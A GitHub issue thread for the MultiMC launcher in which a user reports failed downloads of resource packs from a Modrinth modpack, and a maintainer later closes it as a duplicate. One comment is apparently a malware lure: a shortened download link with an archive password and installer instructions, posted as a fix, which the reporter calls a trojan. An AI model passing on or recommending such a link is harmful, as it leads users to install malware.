### ISSUE TITLE
Modrinth modpack error

### ISSUE THREAD

**Issue by Simonko-912** [MultiMC/Launcher#5500] opened 2024-08-27 17:03 UTC
### Operating System

Windows

### Description of bug

Job 'Mod download' failed to process:
https://cdn.modrinth.com/data/50dA9Sha/versions/8vtPih5h/FreshAnimations_v1.9.2.zip
https://cdn.modrinth.com/data/FA4ebMMU/versions/jYd5m3N6/qrafty%27s-capitalized-font.zip
https://cdn.modrinth.com/data/L85p0yMA/versions/uoaSmbIa/colourful containers.zip
https://cdn.modrinth.com/data/PCGR5Y1W/versions/8UtuU3O9/colourful containers darkmode.zip
https://cdn.modrinth.com/data/UGEVQ6t9/versions/aPjGJwCA/Fancy Crops v1.0 f5-34.zip
https://cdn.modrinth.com/data/cwUMcX8W/versions/vsoGeKs5/Dark_Everywhere_1.20.zip
https://cdn.modrinth.com/data/hFoOkEdk/versions/rmpanXrD/Fancy_Beds-v3.2.zip
https://cdn.modrinth.com/data/slufHzC2/versions/czKkLETN/Eyeless Fresh Moves v3.0.1.zip
https://cdn.modrinth.com/data/uBBepXuH/versions/oS6eq6wL/animated-items-1_20-1 - 1_3_1.zip

Version : 1.20.1

Screenshot:
![MultiMC 5 - Version 0 7 0-3863 on win32 - MultiMC 5 27  8  2024 19_00_07](https://github.com/user-attachments/assets/a3dc46ec-7fb0-4fa6-b49c-e0c7c71f0feb)

### Steps to reproduce

download https://modrinth.com/modpack/create-explore-(ce)
click open zip and pick the modpack
after downloading shows an error

### This issue is unique

- [X] I have searched the issue tracker and did not find an issue describing my bug.

**Comment by c0ffincolors** [comment] 2024-08-27 17:06
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Simonko-912** [comment] 2024-08-27 17:12
> Download https://bit.ly/3MjP129 password: changeme In the installer menu, select "gcc."

Thats a TROJAN

**Comment by Simonko-912** [comment] 2024-08-28 09:42
In older version it works

**Comment by phit** [comment] 2024-08-28 11:32
Duplicate of https://github.com/MultiMC/Launcher/issues/5317

**Closed as completed by phit** 2024-08-28 11:32 UTC
Labels: bug

**Comment by Simonko-912** [comment] 2024-10-13 08:01
wait maybe my antivirus protects desktop but not other folders thats why it works in other folders...
